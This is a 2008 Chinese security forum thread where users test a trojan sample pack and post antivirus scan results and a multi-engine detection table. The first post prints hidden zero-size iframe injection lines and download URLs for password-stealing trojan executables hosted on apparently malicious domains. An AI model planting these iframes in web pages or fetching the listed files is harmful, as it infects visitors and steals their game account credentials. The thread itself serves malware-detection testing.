忘记哪个帖子的网址里提出来的了

zzh161

<iframe src="http://qi.ccbtv.net/hu.htm" width=0 height=0></iframe>     http://js.users.51.la/1465313.js
<iframe src="http://um.uuzzvv.com/uu.htm" width=0 height=0></iframe>
<iframe src="http://fa.55189.net/" width=0 height=0></iframe>
<iframe src="http://bn.jqxx.org/40.htm" width=0 height=0></iframe>      http://js.users.51.la/1586580.js
<iframe src="http://az.sbb22.com/hh.htm" width=0 height=0></iframe>     http://count17.51yes.com
<iframe src=http://ppp.749571.com/dm/diao.htm width=1 height=1></iframe>  http://dd.749571.com/bb/bd.cab,014.exe
<iframe src=http://ppp.749571.com/dm/rl.htm width=1 height=1></iframe>    http://dd.749571.com/bb/newrl.exe
<iframe src=http://ppp.749571.com/dm/rr.htm width=1 height=1></iframe>    http://is.749571.com/bb/a.exe
<iframe src=http://ppp.749571.com/dm/test.htm width=1 height=1></iframe>  http://dd.749571.com/bb/test.exe

ye221017

难道有5个毒  费尔报4个
C:\Documents and Settings\Administrator\桌面\新建文件夹.rar>>014.exe        Trojan.Cap81110.dwdl        木马        还未处理
C:\Documents and Settings\Administrator\桌面\新建文件夹.rar>>bd.exe        Trojan.Cap81110.dwdl        木马        还未处理
C:\Documents and Settings\Administrator\桌面\新建文件夹.rar>>newrl.exe        Trojan.Cap81110.dwdl        木马        还未处理
C:\Documents and Settings\Administrator\桌面\新建文件夹.rar>>test.exe        Trojan.Cap81110.dwdl        木马        还未处理

当空皓月

kis7.00.125
已删除：木马程序 Trojan-PSW.Win32.OnLineGames.noi        文件　: C:\Documents and Settings\hp\桌面\新建文件夹.rar/014.exe//PE_Patch//UPack
已删除：木马程序 Trojan-PSW.Win32.OnLineGames.noi        文件　: C:\Documents and Settings\hp\桌面\新建文件夹.rar/bd.exe//PE_Patch//UPack
已删除：木马程序 Trojan-PSW.Win32.OnLineGames.noi        文件　: C:\Documents and Settings\hp\桌面\新建文件夹.rar/newrl.exe//PE_Patch//UPack
已删除：木马程序 Trojan-PSW.Win32.OnLineGames.noi        文件　: C:\Documents and Settings\hp\桌面\新建文件夹.rar/test.exe//PE_Patch//UPack

好像就4个，剩下的那个用红伞扫，safe

[ 本帖最后由 futuregj 于 2008-1-13 22:19 编辑 ]

ye221017

a-squared	3.0.0.126	2008.01.12	2008-01-12	-	3.743
AntiVir	7.6.0.46	7.0.1.227	2008-01-11	TR/PSW.OnlineGames.noi	4.362
Arcavir	1.0.4	200801130938	2008-01-13	Heur.Win32.I	4.456
AVAST	1.0.8	080112-0	2008-01-12	-	1.786
AVG	7.5.50.442	269.19.2/1222	2008-01-13	PSW.OnlineGames.ABDT	3.064
BitDefender	7.60825.970502	7.16874	2008-01-13	-	10.927
CA (VET)	9.0.0.143	31.3.5451	2008-01-12	Win32/Zuten!generic trojan.	15.044
ClamAV	0.91.2	5479	2008-01-13	PUA.Packed.UPack-2	0.027
Comodo	2.11	2.0.0.403	2008-01-13	-	1.288
CP Secure	1.1.0.695	2008.01.13	2008-01-13	Troj.PSW.W32.OnLineGames.noi	13.270
Dr.WEB	4.44.0.9170	2008.01.13	2008-01-13	-	10.435
ewido	4.0.0.2	2008.01.12	2008-01-12	-	3.327
F-PROT	4.4.1.52	20080112	2008-01-12	Possible W32/Heuristic-162!Eldorado (damaged, not disinfectable)	3.567
F-SECURE	5.51.6100	2008.01.12.01	2008-01-12	Trojan-PSW.Win32.OnLineGames.noi [AVP]	6.052
IKARUS	T3.1.01.15	2008.01.13.70136	2008-01-13	-	0.776
MKS_VIR	2.01	2008.01.13	2008-01-13	Heur.Win32	5.948
NOD32	2.70.10	2787	2008-01-12	-	0.503
NORMAN	5.91.08	5.90	2008-01-11	W32/Suspicious_U.gen	8.389
nProtect	2008-01-11.00	1120820	2008-01-11	Trojan-Downloader/W32.Small.6748	4.785
Prevx	V2	20080113	2008-01-13	-	12.581
QuickHeal	9.00	2008.01.12	2008-01-12	Suspicious - DNAScan	4.250
SOPHOS	2.49.1	4.21	2008-01-08	Mal/Dropper-Y	16.618
The Hacker	6.2.9	v00186	2008-01-11	W32/Behav-Heuristic-060	1.284
VBA32	3.12.2.5	20080112.2245	2008-01-12	-	7.650
ViRobot	20080111	2008.01.11	2008-01-11	-	0.990
VirusBuster	4.3.19:9	9.119.4/11.0	2008-01-12	Packed/Upack	3.716
卡巴斯基	5.5.10	2008.01.13	2008-01-13	Trojan-PSW.Win32.OnLineGames.noi	15.272
安博士V3	2008.01.12.00	2008.01.12	2008-01-12	-	1.328
江民杀毒	10.00.650	2008.01.07	2008-01-07	-	1.583
熊猫卫士	9.04.03.0001	2008.01.12	2008-01-12	Suspicious file	3.444
瑞星	19.0	20.26.52.00	2008-01-12	Trojan.PSW.Win32.OnlineGames.GEN	1.918
赛门铁克	1.3.0.24	20080112.003	2008-01-12	Infostealer	0.313
趋势	8.500-1001	4.942.51	2008-01-13	TSPY_ONLINEG.BPN	0.040
迈克菲	5.2.00	5205	2008-01-11	New Malware.aj	7.709
金山毒霸	2007.6.20.249	2008.1.13	2008-01-13	Win32.PSWTroj.Win32.77964	2.165
飞塔	2.81-3.11	8.621	2008-01-13	W32/Dropper.NOI!tr.pws	2.329

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.PSW.Win32.OnlineGames.GEN

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.26.62

jimmyleo

spaceplane

nod居然一个都没扫出.....
包里5个，一个都没查出，说明被针对过


金山扫出4个

[ 本帖最后由 spaceplane 于 2008-1-13 22:32 编辑 ]

taiw_1144

微点报四个

木马名称:Trojan-PSW.Win32.OLGames.gtm

程序:
C:\DOCUMENTS AND SETTINGS\WO\LOCAL SETTINGS\TEMP\RAR$EX00.531\014.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:Trojan-PSW.Win32.OLGames.gtm

程序:
C:\DOCUMENTS AND SETTINGS\WO\LOCAL SETTINGS\TEMP\RAR$EX00.531\BD.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:Trojan-PSW.Win32.OLGames.gtm

程序:
C:\DOCUMENTS AND SETTINGS\WO\LOCAL SETTINGS\TEMP\RAR$EX00.531\NEWRL.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:Trojan-PSW.Win32.OLGames.gtm

程序:
C:\DOCUMENTS AND SETTINGS\WO\LOCAL SETTINGS\TEMP\RAR$EX00.531\TEST.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

剑书

Begin scan in 'K:\新建文件夹.rar'
K:\新建文件夹.rar
  [0] Archive type: RAR
  --> 014.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.noi
  --> bd.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.noi
  --> newrl.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.noi
  --> test.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.noi
      [INFO]      A backup was created as 'ad1187eb.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!

hkt988

NOD32右键扫描不报，运行时杀了。